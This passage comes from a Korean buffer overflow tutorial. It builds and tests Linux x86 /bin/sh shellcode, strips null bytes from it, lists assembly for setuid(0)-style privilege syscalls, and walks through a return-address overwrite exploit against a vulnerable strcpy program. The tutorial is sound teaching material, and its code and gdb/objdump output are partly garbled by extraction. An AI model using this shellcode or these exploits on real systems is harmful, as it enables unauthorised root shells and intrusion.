92 0x <start+15>: mov $0xb,%eax 0x <start+20>: mov %esi,%ebx 0x804844b <start+22>: lea 0x8(%esi),%ecx 0x804844e <start+25>: lea 0xc(%esi),%edx 0x <start+28>: int $0x80 0x <start+30>: mov $0x1,%eax 0x <start+35>: mov $0x0,%ebx 0x804845d <start+40>: int $0x80 0x804845f <callz>: call 0x <start> 0x <callz+5>: das 0x <callz+6>: bound %ebp,0x6e(%ecx) 0x <callz+9>: das 0x <callz+10>: jae 0x80484d3 <_fp_hw+3> 0x804846b <callz+12>: add %bl,0xffffffc3(%ebp) End of assembler dump. x/bx main+3 0x <main+3>: 0xeb 0x <main+4>: 0x2a 0x <start>: 0x5e 0x <start+1>: 0x89 0x <start+2>: 0x76 0x <start+3>: 0x08 0x <start+4>: 0xc6 0x804843a <start+5>: 0x46 0x804843b <start+6>: 0x07 0x804843c <start+7>: 0x00 0x804843d <start+8>: 0xc7 0x804843e <start+9>: 0x46 91

93 0x804843f <start+10>: 0x0c 0x <start+11>: 0x00 0x <start+12>: 0x00 0x <start+13>: 0x00 0x <start+14>: 0x00 0x <start+15>: 0xb8 0x <start+16>: 0x0b 0x <start+17>: 0x00 0x <start+18>: 0x00 0x <start+19>: 0x00 0x <start+20>: 0x89 0x804844a <start+21>: 0xf3 0x804844b <start+22>: 0x8d 0x804844c <start+23>: 0x4e 0x804844d <start+24>: 0x08 0x804844e <start+25>: 0x8d 0x804844f <start+26>: 0x56 0x <start+27>: 0x0c 0x <start+28>: 0xcd 0x <start+29>: 0x80 0x <start+30>: 0xb8 0x <start+31>: 0x01 0x <start+32>: 0x00 92

94 0x <start+33>: 0x00 0x <start+34>: 0x00 0x <start+35>: 0xbb 0x <start+36>: 0x00 0x804845a <start+37>: 0x00 0x804845b <start+38>: 0x00 0x804845c <start+39>: 0x00 0x804845d <start+40>: 0xcd 0x804845e <start+41>: 0x80 0x804845f <callz>: 0xe8 0x <callz+1>: 0xd1 0x <callz+2>: 0xff 0x <callz+3>: 0xff 0x <callz+4>: 0xff 0x <callz+5>: 0x2f 0x <callz+6>: 0x62 0x <callz+7>: 0x69 : 위의결과를보면알수있듯이 gdb를사용하여추출한것은그내용을알아보기도힘들고한라인에하나씩나오기때문에정리하기가불편하다. 그래서이불편함을덜기위해 objdump라는명령을사용해정리해보는것이더간편할것같다. objdump를이용하면다음과같다. 물론결과는같다. [vangelis@localhost test]$ objdump -d shellcodemake1 more 93

95 -- 중략 <main>: : 55 push %ebp : 89 e5 mov %esp,%ebp : eb 2a jmp f <callz> <start>: : 5e pop %esi : mov %esi,0x8(%esi) : c movb $0x0,0x7(%esi) d: c7 46 0c movl $0x0,0xc(%esi) : b8 0b mov $0xb,%eax : 89 f3 mov %esi,%ebx b: 8d 4e 08 lea 0x8(%esi),%ecx e: 8d 56 0c lea 0xc(%esi),%edx : cd 80 int $0x : b mov $0x1,%eax : bb mov $0x0,%ebx d: cd 80 int $0x f <callz>: f: e8 d1 ff ff ff call <start> : 2f das : e bound %ebp,0x6e(%ecx) : 2f das : jae 80484d3 <_fp_hw+0x3> b: 00 5d c3 add %bl,0xffffffc3(%ebp) e: 89 f6 mov %esi,%esi -- 중략 -- test]$ gdb를이용한것보다쉘코드의내용을알아보기가더쉽다. 이제부터는 objdump를 gdb 대신 94

96 사용하기로하겠다. 이제나온코드를정리를해보자. 색깔이들어가있는부분이다 "\xeb\x2a" "\x5e" "\x89\x76\x08" "\xc6\x46\x07\x00" "\xc7\x46\x0c\x00\x00\x00\x00" "\xb8\x0b\x00\x00\x00" "\x89\xf3" "\x8d\x4e\x08" "\x8d\x56\x0c" "\xcd\x80" "\xb8\x01\x00\x00\x00" "\xbb\x00\x00\x00\x00" "\xcd\x80" "\xe8\xd1\xff\xff\xff/bin/sh"; 그런데이코드를실행하면쉘을떨어지지만한가지중대한문제가있음을알수있다. 먼저 제대로작동하는지확인해보자. test]$ vi shellcode1.c char shellcode[]= "\xeb\x2a" /* jmp f <callz> */ "\x5e" /* pop %esi */ "\x89\x76\x08" /* mov %esi,0x8(%esi) */ "\xc6\x46\x07\x00" /* movb $0x0,0x7(%esi) */ "\xc7\x46\x0c\x00\x00\x00\x00" /* movl $0x0,0xc(%esi) */ "\xb8\x0b\x00\x00\x00" /* mov $0xb,%eax */ "\x89\xf3" /* mov %esi,%ebx */ "\x8d\x4e\x08" /* lea 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* lea 0xc(%esi),%edx */ 95

97 "\xcd\x80" /* int $0x80 */ "\xb8\x01\x00\x00\x00" /* mov $0x1,%eax */ "\xbb\x00\x00\x00\x00" /* mov $0x0,%ebx */ "\xcd\x80" /* int $0x80 */ "\xe8\xd1\xff\xff\xff/bin/sh"; /* call <start> +/bin/sh */ void main() { int *ret; ret=(int *)&ret+2; (*ret)=(int)shellcode; ~ ~ [vangelis@localhost test]$ gcc -o shellcode1 shellcode1.c shellcode1.c: In function `main': shellcode1.c:22: warning: return type of `main' is not `int' [vangelis@localhost test]$./shellcode1 sh-2.05$ 일단은쉘을띄우는데는성공했으나앞에서도살펴보았듯이 null byte(0x0) 가코드안에있어 오버플로우공격을위해서는사용될수없다. 이제 null byte 를없애주는작업이필요하다. 위의결과를살펴보면 x00 부분이나왔던곳은다음과같다 : c movb $0x0,0x7(%esi) d: c7 46 0c movl $0x0,0xc(%esi) : b8 0b mov $0xb,%eax : b mov $0x1,%eax : bb mov $0x0,%ebx 결국 shellcodemake1.c의소스를수정해야한다. 이것은 Aleph One의글중에서도이미살펴보았던부분이다. 수정내용은다음과같다 movb $0x0,0x7(%esi) xorl %eax,%eax 96

98 molv $0x0,0xc(%esi) movb %eax,0x7(%esi) movl %eax,0xc(%esi) movl $0xb,%eax movb $0xb,%al movl $0x1, %eax xorl %ebx,%ebx movl $0x0, %ebx movl %ebx,%eax inc %eax 수정한소스는이용해다시쉘코드를추출해보자. test]$ vi shellcodemake2.c #include <stdio.h> void main() { asm (" jmp callz start: popl %esi movl %esi, 0x8(%esi) xorl %eax,%eax movb %eax,0x7(%esi) movl %eax,0xc(%esi) movb $0xb,%al movl %esi, %ebx leal 0x8(%esi), %ecx leal 0xc(%esi), %edx int $0x80 xorl %ebx,%ebx movl %ebx,%eax inc %eax int $0x80 97

99 callz: call start ");.string \"/bin/sh\" ~ ~ [vangelis@localhost test]$ gdb shellcodemake2 GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %esp,%ebp 0x <main+3>: jmp 0x <callz> 0x <start>: pop %esi 0x <start+1>: mov %esi,0x8(%esi) 0x <start+4>: xor %eax,%eax 0x804843b <start+6>: mov %al,0x7(%esi) 0x804843e <start+9>: mov %eax,0xc(%esi) 0x <start+12>: mov $0xb,%al 0x <start+14>: mov %esi,%ebx 0x <start+16>: lea 0x8(%esi),%ecx 0x <start+19>: lea 0xc(%esi),%edx 0x804844b <start+22>: int $0x80 0x804844d <start+24>: xor %ebx,%ebx 0x804844f <start+26>: mov %ebx,%eax 0x <start+28>: inc %eax 0x <start+29>: int $0x80 0x <callz>: call 0x <start> 0x <callz+5>: das 0x804845a <callz+6>: bound %ebp,0x6e(%ecx) 0x804845d <callz+9>: das 0x804845e <callz+10>: jae 0x80484c8 <_fini+24> 0x <callz+12>: add %bl,0xffffffc3(%ebp) End of assembler dump. x/bx main+3 0x <main+3>: 0xeb 98

100 0x <main+4>: 0x1f 0x <start>: 0x5e 0x <start+1>: 0x89 0x <start+2>: 0x76 0x <start+3>: 0x08 0x <start+4>: 0x31 0x804843a <start+5>: 0xc0 0x804843b <start+6>: 0x88 0x804843c <start+7>: 0x46 0x804843d <start+8>: 0x07 0x804843e <start+9>: 0x89 0x804843f <start+10>: 0x46 0x <start+11>: 0x0c 0x <start+12>: 0xb0 0x <start+13>: 0x0b 0x <start+14>: 0x89 0x <start+15>: 0xf3 0x <start+16>: 0x8d 0x <start+17>: 0x4e 0x <start+18>: 0x08 0x <start+19>: 0x8d 0x <start+20>: 0x56 0x804844a <start+21>: 0x0c 99

101 0x804844b <start+22>: 0xcd 0x804844c <start+23>: 0x80 0x804844d <start+24>: 0x31 0x804844e <start+25>: 0xdb 0x804844f <start+26>: 0x89 0x <start+27>: 0xd8 0x <start+28>: 0x40 0x <start+29>: 0xcd 0x <start+30>: 0x80 0x <callz>: 0xe8 0x <callz+1>: 0xdc 0x <callz+2>: 0xff 0x <callz+3>: 0xff 0x <callz+4>: 0xff 0x <callz+5>: 0x2f : 다음은 objdump 명령을사용한경우이다. [vangelis@localhost test]$ objdump -d shellcodemake2 more shellcodemake2: file format elf32-i386 Disassembly of section.init: bc <_init>: 80482bc: 55 push %ebp 80482bd: 89 e5 mov %esp,%ebp 80482bf: 83 ec 08 sub $0x8,%esp 80482c2: e8 8d call <call_gmon_start> 80482c7: 90 nop 100

102 80482c8: e call 80483f0 <frame_dummy> 80482cd: e8 9e call < do_global_ctors_aux> 80482d2: c9 leave 80482d3: c3 ret -- 중략 <main>: : 55 push %ebp : 89 e5 mov %esp,%ebp : eb 1f jmp <callz> <start>: : 5e pop %esi : mov %esi,0x8(%esi) : 31 c0 xor %eax,%eax b: mov %al,0x7(%esi) e: c mov %eax,0xc(%esi) : b0 0b mov $0xb,%al : 89 f3 mov %esi,%ebx : 8d 4e 08 lea 0x8(%esi),%ecx : 8d 56 0c lea 0xc(%esi),%edx b: cd 80 int $0x d: 31 db xor %ebx,%ebx f: 89 d8 mov %ebx,%eax : 40 inc %eax : cd 80 int $0x <callz>: : e8 dc ff ff ff call <start> : 2f das a: e bound %ebp,0x6e(%ecx) d: 2f das e: jae 80484c8 <gcc2_compiled.+0x18> : 00 5d c3 add %bl,0xffffffc3(%ebp) 101

103 : 90 nop -- 중략 b0 <_fini>: 80484b0: 55 push %ebp 80484b1: 89 e5 mov %esp,%ebp 80484b3: 53 push %ebx 80484b4: 52 push %edx 80484b5: e call 80484ba <gcc2_compiled.+0xa> 80484ba: 5b pop %ebx 80484bb: 81 c add $0x1042,%ebx 80484c1: 8d lea 0x0(%esi),%esi 80484c4: e8 b7 fe ff ff call < do_global_dtors_aux> 80484c9: 8b 5d fc mov 0xfffffffc(%ebp),%ebx 80484cc: c9 leave 80484cd: c3 ret test]$ 이제추출한쉘코드를정리해보자 \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0 \x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8 \x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh ; 이제추출한코드를이용해쉘을실행해보자. [vangelis@localhost test]$ vi shellcode2.c char shellcode[]= void main() { \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0 \x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8 \x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh ; int *ret; 102

104 ret=(int *)&ret+2; (*ret)=(int)shellcode; ~ ~ [vangelis@localhost test]$ gcc o shellcode2 shellcode2.c [vangelis@localhost test]$./shellcode2 sh-2.05$ 쉘이떨어졌다. gdb를사용할경우보다 objdump를이용하는것이더간단하게보인다. 그런데요즘각종쉘코드제작방법이소개되고있다. 그모든방법을모두소개할수는없으므로한가지만소개하고쉘코드섹션을마치도록하겠다. 더많은쉘코드제작방법에대해서는인터넷의많은자료들을참고하길바란다. 다음은 Red Hat 8.0 버전에서테스트한내용이다. [vangelis@localhost test]$ mkdir shell [vangelis@localhost test]$ cd shell [vangelis@localhost shell]$ vi shell.c #include <stdio.h> int main() { char *name[2]; name[0]="/bin/sh"; name[1]=null; execve(name[0],name,null); return 0; [vangelis@localhost shell]$ gcc -o shell shell.c 103

105 shell]$./shell sh-2.05b$ sh-2.05b$ exit exit shell]$ vi shellcode.s.section.text.global main main: xorl %eax, %eax xorl %ebx, %ebx xorl %ecx, %ecx xorl %edx, %edx pushl %edx pushl $0x68732f2f /* //sh 두개의슬래쉬중하나는 escape 문자임 */ pushl $0x6e69622f /* /bin */ movl %esp, %ebx pushl %edx pushl %ebx movl %esp, %ecx movl $0xb, %eax int $0x80 xorl %ebx, %ebx movl %ebx, %eax incl %eax int $0x80 ~ ~ 104

106 /****** 참고 **************************************************************************/ 0005c d e0 2F E 2F 2F /bin//sh /**************************************************************************************/ shell]$ gcc -o shellcode shellcode.s shell]$./shellcode sh-2.05b$ exit exit shell]$ gdb shellcode GNU gdb Red Hat Linux ( ) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... disas main Dump of assembler code for function main: 0x80482f4 <main>: xor %eax,%eax 0x80482f6 <main+2>: xor %ebx,%ebx 0x80482f8 <main+4>: xor %ecx,%ecx 0x80482fa <main+6>: xor %edx,%edx 0x80482fc <main+8>: push %edx 0x80482fd <main+9>: push $0x68732f2f 0x <main+14>: push $0x6e69622f 0x <main+19>: mov %esp,%ebx 0x <main+21>: push %edx 0x804830a <main+22>: push %ebx 0x804830b <main+23>: mov %esp,%ecx 0x804830d <main+25>: mov $0xb,%eax 0x <main+30>: int $0x80 105

107 0x <main+32>: xor %ebx,%ebx 0x <main+34>: mov %ebx,%eax 0x <main+36>: inc %eax 0x <main+37>: int $0x80 0x804831b <main+39>: nop End of assembler dump. x/36b main 0x80482f4 <main>: 0x31 0xc0 0x31 0xdb 0x31 0xc9 0x31 0xd2 0x80482fc <main+8>: 0x52 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x <main+16>: 0x62 0x69 0x6e 0x89 0xe3 0x52 0x53 0x89 0x804830c <main+24>: 0xe1 0xb0 0x0b 0xcd 0x80 0x31 0xdb 0x89 0x <main+32>: 0xd8 0x40 0xcd 0x80 q [vangelis@localhost shell]$ 쉘코드를추출하면다음과같다 "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" "\x52\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x52\x53\x89" "\xe1\xb0\x0b\xcd\x80\x31\xdb\x89" "\xd8\x40\xcd\x80" [vangelis@localhost shell]$ vi shellcode2.c #include <stdio.h> char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" "\x52\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x52\x53\x89" "\xe1\xb0\x0b\xcd\x80\x31\xdb\x89" "\xd8\x40\xcd\x80"; int main(void) 106

108 { int *ret; ret = (int *)&ret+2; (*ret) = (int)shellcode; ~ ~ [vangelis@localhost shell]$ gcc -o shellcode2 shellcode2.c [vangelis@localhost shell]$./shellcode2 sh-2.05b$ 쉘이떨어졌다. 다음은몇가지시스템호출에대한어셈블리어코드이다. 참고하길바란다. 환경은리눅스커널버전 , hcc 3.2.2, gdb5.3, strcae 4.4이다. 아래것을볼때는앞에서제공한 syscall table을같이보아야할것이다. 이유는 %eax에전달되는값이무엇인지알기위해서이다. setuid(0); - set user id xor %ebx, %ebx /* argument 1, set ebx register to 0 (user_id) */ mov $0x17, %eax /* copy syscall(converted to hex) to eax register */ int $0x80 /* interupt to execute syscall */ setgid(0); - set group id xor %ebx, %ebx /* argument 1, set ebx register to 0 (group_id) */ mov $0x2E, %eax /* copy syscall(converted to hex) to eax register */ int $0x80 /* interupt to execute syscall */

109 setreuid(0,0); - set real and effective user id xor %ebx, %ebx /* argument 2, set ebx register to 0 (reale_user_id) */ xor %ecx, %ecx /* argument 1, set ecx register to 0 (effective_user_id) */ mov $0x46, %eax /* copy syscall(converted to hex) to eax register */ int $0x80 /* interupt to execute syscall */ setregid(0,0); - set real and effective group id xor %ebx, %ebx /* argument 2, set ebx register to 0 (reale_group_id) */ xor %ecx, %ecx /* argument 1, set ecx register to 0 (effective_group_id) */ mov $0x47, %eax /* copy syscall(converted to hex) to eax register */ int $0x80 /* interupt to execute syscall */ setresuid(0,0,0); - set real, effective and saved user id xor %ebx, %ebx /* argument 3, set ebx register to 0 (reale_user_id) */ xor %ecx, %ecx /* argument 2, set ecx register to 0 (effective_user_id) */ xor %edx, %edx /* argument 1, set edx register to 0 (saved_user_id) */ mov $0xA4, %eax /* copy syscall(converted to hex) to eax register */ int $0x80 /* interupt to execute syscall */ setresgid(0,0,0); - set real, effective and saved group id xor %ebx, %ebx /* argument 3, set ebx register to 0 (reale_group_id) */ xor %ecx, %exc /* argument 2, set ecx register to 0 (effective_group_id)*/ xor %edx, %edx /* argument 1, set edx register to 0 (saved_group_id) */ mov $0xAA, %eax /* copy syscall(converted to hex) to eax register */ int $0x80 /* interupt to execute syscall */

110 write(); xor %edx, %edx /* set edx register to 0 */ xor %ebx, %ebx /* set ebx register to 0 */ push %ebx /* push ebx on the stack */ push <txt> /* push the text (converted to hex) on the stack */ mov %esp, %ecx /* write the address to ecx register */ mov $0x<size>, %edx /* move the size of the text+\0 to edx register */ mov $0x4, %eax /* move syscall(converted to hex) to eax register */ int $0x80 /* interupt to execute syscall */ execve(); int execve(const char filename, char const argv[], char const envp[]); xor %eax, %eax /* set eax register to 0 */ push %eax /* push eax on the stack */ push $0x68732f2f /* push //sh on the stack */ push $0x6e69622f /* push /bin on the stack */ mov %esp, %ebx /* wrote the starting address of string to ebx register */ push %eax /* terminate the **argv */ push %ebx /* create char **argv */ mov %esp, %ecx /* write the address to ecx register */ xor %edx, %edx /* set edx register to 0 */ mov $0xb,%eax /* move syscall(converted to hex) to eax register */ int $0x80 /* interupt to execute syscall */ exit(0); xor %ebx, %ebx /* argument 1, set ebx register to 0 */ mov $0x1, %eax /* copy syscall(converted to hex) to eax register */ int $0x80 /* interupt to execute syscall */

111 Writing an Exploit (or how to mung the stack) 이제버퍼오버플로우취약점을가진프로그램에대해 exploiting할준비가된것같다. 우리가앞에서만든쉘코드는버퍼를오버플로우시킬때사용되는문자열의일부분이된다. 이말은바운드체킹을하지않는함수, 예를들어 strcpy() 와같은함수는공격자가입력하는대로데이터를다받아들여지정된버퍼의한계를넘어서스택포인터나리턴어드레스도덮어쓸수있고, 이때공격자가쉘코드를함께입력하는문자열에넣고, 함수가리턴할때쉘코드의주소를가리키게하면공격자가원하는코드를실행할수있게할수있다는것을의미한다. 다음을보자. shell]$ vi overflow1.c char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; /* buffer overflow 를수행할문자열선언 */ char large_string[128]; void main() { /* buffer overflow 가발생될문자열선언 */ char buffer[96]; /* 루프를위한변수 i 선언 */ int i; /* large_string 의시작주소를저장할 long_ptr 포인터변수선언 */ long *long_ptr = (long *) large_string; /* long_ptr 에 buffer 의시작주소를대입. 32 번반복하므로 long_ptr 은 32 개의 buffer 시작주소를반복적으로가지게됨. 즉, long_ptr 포인터변수가 large_string 의시작주소를저장하고있으므로 large_string[0] 에서 large_string[127] 까지의값이 &buffer[0] 값이됨 */ [ &buffer[0] ][ &buffer[0] ][ &buffer[0] ]... [ &buffer[0] ] for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; 110

112 /* large_string 의앞쪽부분에 shellcode 대입. large_string 는최종적으로다음과같은내용을포함하게됨. */ [ shellcode ][ &buffer[0] ][ &buffer[0] ]... [ &buffer[0] ] for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; /* buffer 에 large_string 을 strcpy() 함수로문자열복사를수행함. buffer 의길이는 96 이고, large_string 의길이는 128 이므로 buffer 변수에 overflow 가발생하고결과적으로 main() 함수의리턴어드레스를 &buffer[0] 으로덮어쓰게됨. -=[ buffer ]= [ buffer ][ main_sfp ][ main_ret ] -=[ large_string ]= [ shellcode ][ &buffer[0] ]... [ &buffer[0] ][ &buffer[0] ]... [ &buffer[0] ] */ strcpy() 함수의수행결과 &buffer[0] 에는 shellcode 가할당되므로 main() 함수가종료되면 shellcode 가실행. strcpy(buffer,large_string); ~ ~ [vangelis@localhost shell]$ gcc -o overflow overflow1.c overflow1.c: In function `main': overflow1.c:9: warning: return type of `main' is not `int' [vangelis@localhost shell]$./oveflow1 sh-2.05b$ 이결과는 Aleph One의글에서나오는 overflow1.c를필자의시스템에서실행해본것이다. 위의소스는취약점을가진프로그램인동시에 exploit이기도하다. 그래서원문에서소스파일이름은 overflow1.c라고했고, 컴파일할때실행파일의이름은 exploit1라고한것이다. 어쨌던이것은 Aleph One이쉘코드로리턴어드레스를덮어쓰는것을보여주기위해제시한소스이다. 위의소스를간단히분석해보면다음과같다. buffer[] 의주소로배열 large_string[] 을채운다. 그런다음 large_string의시작부분에 111

113 쉘코드를복사한다. strcpy() 는 large_string을바운드체킹없이 buffer에복사한다. 이로인해리턴어드레스를오버플로우시켜, 쉘코드가위치한주소로리턴어드레스를덮어쓴다. main() 함수의끝에도달하면쉘코드의주소로리턴하게되고, 따라서쉘을실행하게된다. 그러나위와같은취약점을가지고있으면서서버에서사용될프로그램은이세상에존재하지않는다. 어떤프로그램에쉘코드를사용하겠는가. 공격용프로그램이아니라면쉘코드를사용하지않을것이라는것은아주당연한일이다. 앞에서도언급했지만위의소스는쉘코드를사용해오버플로우취약점을가지고있는프로그램의리턴어드레스를덮어쓰는것을보여주는단순히예제프로그램일뿐이다. 따라서우리가직면하게되는문제는버퍼와쉘코드가어떤주소에위치하는지알아내는것이다. 어떤문제점이있으면항상그것에대한해결책이있듯이, 이문제에대한실마리를제공할수있는것이모든프로그램에대해스택은같은주소에서시작한다는것이다. 대부분의프로그램이한번에스택상에엄청난양의데이터를집어넣지는않는다. 그래서스택이어디에서시작하는지만알고있다면많은시행착오가있을지는모르겠지만문제가해결될수는있다. 즉, 우리가오버플로우시키고자원하는버퍼가어디에있을지추측할수있다는것이다. 그러나뒤에서언급하겠지만버퍼의위치를추측하는것은정말많은시행착오를겪게만드는작업이다. 막연한추측으로는과학적인해킹은불가능하다. 그래서우리에게필요한프로그램이스택포인터를알려주는프로그램이필요하게되었으며, 아래제시한 sp.c가바로그것이다. 스택포인터는스택의꼭대기를가르킨다고했다. 스택포인터의위치만알게된다면버퍼의위치문제는그만큼간단한것이될수있고, 우리가겪게될시행착오는그만큼줄어들게될것이다. 다음은필자의시스템에서테스트한결과이다. 참고로 sp.c라는소스에서 get_sp() 라는사용자정의함수의이름을굳이 get_sp() 라고할필요는없다. 너무당연한것인가? 얼마든지다른이름을사용해도된다. 사용자정의함수의이름은얼마든지바꿀수있다. 어떤문서를읽든소스자체에대해두려움을가지지는말자. shell]$ vi sp.c unsigned long get_sp(void){ asm ( movl %esp,%eax ); void main(){ printf( 0x%x\n,get_sp()); 112

114 ~ ~ [vangelis@localhost shell]$ gcc -o sp sp.c sp.c: In function `main': sp.c:6: warning: return type of `main' is not `int' [vangelis@localhost shell]$./sp 0xbffff908 스택포인터의위치를알려주는위의 sp.c 라는소스에서초보들에게아마도어려울수 있는부분이 asm ( movl %esp,%eax ); 일것이다. 여기에대해간단히설명하겠다. 우선 레지스터에접근하기위해 asm () 이라는 inline assembly 21 함수를사용했다. gcc 에서는 inline assembly 함수 asm() 을 asm () 으로표시한다. 간단히다른말로하자면 C 소스코드에서인라인어셈블러를사용하도록한것이다. 리눅스에서는유닉스표준인 AT&T 어셈블리어문장 (syntax) 을사용한다는것은다들알고있을것이다. 가끔 Intel 어셈블리어문장과혼동을일으킬수있는데, Intel 어셈블리어문장에서는레지스터앞에 % 라는 prefix를붙이지않는다. 그리고출발지 (source) 와목적지 (destination) 의위치가 AT&T와 Intel 어셈블리어문법에서서로다르다. 즉, AT&T 어셈블리어문장에서는항상 source가왼쪽에, destination이오른쪽에위치한다. Intel 어셈블리어문장의경우이와반대이다. sp.c에나오는부분을 AT&T와 Intel 어셈블리어문장의차이점을고려해서표시하면다음과같다. AT&T: movl %esp, %eax Intel: mov eax, esp movl %esp,%eax 부분은스택포인터의주소를 eax 레지스터에로딩하는작업이다. 로딩이끝나면 main() 함수에있는 printf( 0x%x\n,get_sp()); 을통해 eax 레지스터에있는스택포인터의위치를 16진수로출력하는것이다. 이제오버플로우취약점을가진프로그램을예를하나더들어공격까지의과정을알아보도록하자. vulnerable.c inline assembly 에대해간단히알아보고자한다면다음을참고하길바란다

115 void main(int argc, char *argv[]) { char buffer[512]; if(argc > 1) strcpy(buffer,argv[1]); 언뜻보아도버퍼오버플로우취약점이있다는것을알수있는소스이다. 우선소스에대해분석해보자. 이소스에서먼저 main(int argc, char *argv[]) 부분을설명하도록하겠다. 사실 C 언어에대한기본만되어있어도여기에대해서는잘알고있을것이다. 그러나이문서는초보자들도독자의대상으로생각하고있기때문에간단하게설명하겠다. 이부분은명령라인에서입력한문자열은 main() 함수에인수를건네줄수있다는것을나타낸다. main() 함수에건네지는인수는 argc, argv이다. argc는인수의개수를의미하며, argv는인수의문자열실체를가리키는포인터이다. 예를들어, 위의 vulnerable.c라는소스코드를컴파일하여다음과같이인수를주어실행했다고하자. [vangelis@localhost bof]# gcc o vulnerable vulnerable.c [vangelis@localhost bof]#./ vulnerable a argv[0] 에해당하는것은 vulnerable 라는파일명을가리키며, argv[1] 은첫번째인수 문자열인 a 를의미한다. argc 는당연 2 가된다. vulnerable 와 a 2 개가 argc 의개수이다. if(argc > 1) strcpy(buffer,argv[1]); 이부분은프로그램을실행할때프로그램이름이외에인자를적어도하나이상은입력한다는 것을보여주며 (if(argc > 1)), 512 로그한계가지정된 buffer 에 argv[1] 를입력하게되는데, strcpy() 함수는바운트체킹을하지않기때문에사용자가입력하는인자를다받아들이게 되며, 만약 512 바이트이상입력하게되면오버플로우가발생한다. 이제취약한프로그램을공격하는 exploit 에대해살펴보기로한다. 아래나오는 exploit2.c 는버퍼의크기와스택포인터로부터의 offset 을파라미터로받아들인다. 그리고 공격의편이성을위해환경변수 (environment variable) 에오버플로우시킬문자열, 즉쉘코드를 114

116 넣는다. 그럼왜환경변수에오버플로우시킬문자열을넣게되면공격이용이해지는가? 이것에 대해이해하기위해먼저환경변수에대해살펴볼필요가있다. 사용자의환경변수에대해 알아보기위해 env 라는명령을내리면된다. bof]$ env SSH_AGENT_PID=901 HOSTNAME=localhost.localdomain PVM_RSH=/usr/bin/rsh TERM=xterm SHELL=/bin/bash HISTSIZE=1000 JLESSCHARSET=ko GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc-1.2-gnome2 WINDOWID= QTDIR=/usr/lib/qt3-gcc3.2 OLDPWD=/home/vangelis/test USER=vangelis LS_COLORS=no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33;01:or=01; 05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32:*.btm=00;32:*.bat=0 0;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=00;31:*.taz=00;31:*.lzh=00;31: *.zip=00;31:*.z=00;31:*.z=00;31:*.gz=00;31:*.bz2=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31 :*.cpio=00;31:*.jpg=00;35:*.gif=00;35:*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*. tif=00;35: SSH_AUTH_SOCK=/tmp/ssh-XX6ppeE8/agent.842 PVM_ROOT=/usr/share/pvm3 USERNAME=root SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/842 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/b in MAIL=/var/spool/mail/root PWD=/home/vangelis/test/bof INPUTRC=/etc/inputrc LANG=ko_KR.eucKR GDMSESSION=Default SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass SHLVL=3 HOME=/home/vangelis GNOME_DESKTOP_SESSION_ID=Default BASH_ENV=/root/.bashrc LOGNAME=vangelis LESSOPEN= /usr/bin/lesspipe.sh %s DISPLAY=:0 G_BROKEN_FILENAMES=1 115

117 XAUTHORITY=/home/vangelis/.xauthms7oup COLORTERM=gnome-terminal _=/bin/env 이제새로운내용을환경변수에넣어보자. 환경변수에새로운내용을추가할때 export 라는 명령을사용하면된다. bof]$ export wowhacker="/bin/sh" bof]$ echo $wowhacker /bin/sh $wowhacker 라는항목에 /bin/sh 이들어가있다. 이제 $wowhacker 를실행해보자. bof]$ $wowhacker sh-2.05b$ 쉘이실행되었다. 그럼 env 를실행하여실제환경변수의내용을살펴보자. bof]$ env SSH_AGENT_PID=901 HOSTNAME=localhost.localdomain PVM_RSH=/usr/bin/rsh TERM=xterm SHELL=/bin/bash HISTSIZE=1000 JLESSCHARSET=ko GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc-1.2-gnome2 WINDOWID= QTDIR=/usr/lib/qt3-gcc3.2 OLDPWD=/home/vangelis/test USER=vangelis LS_COLORS=no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33;01:or=01; 05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32:*.btm=00;32:*.bat=0 0;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=00;31:*.taz=00;31:*.lzh=00;31: 